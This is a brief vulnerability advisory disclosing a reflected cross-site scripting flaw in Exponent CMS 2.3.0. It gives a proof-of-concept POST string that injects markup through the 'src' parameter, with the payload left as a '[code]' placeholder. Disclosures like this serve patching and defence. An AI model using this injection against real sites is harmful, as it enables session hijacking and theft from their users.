Title: exponent-2.3.0 CMS index.php POST Reflected XSS
Severity: High
CVE-ID: To Be Assigned
Release Date: 20 September 2014
Author: Kenneth F. Belva
Websites: http://silverbackventuresllc.com
http://xssWarrior.com
http://securitymaverick.com
Twitter: @infosecmaverick
Contact: Please use website contact form.
Mail:
URL: http://sourceforge.net/projects/exponentcms/
Vendor:
Remote Exploit: Yes
Discovered with: xssWarrior - http://xssWarrior.com
Description:
============
XSS in the src field for on a POST request.
Proof of Concept :
==================
http://[domain]/exponent-2.3.0/exponent-2.3.0/index.php
int=&src="/>[code]<"&controller=search&search=&action=none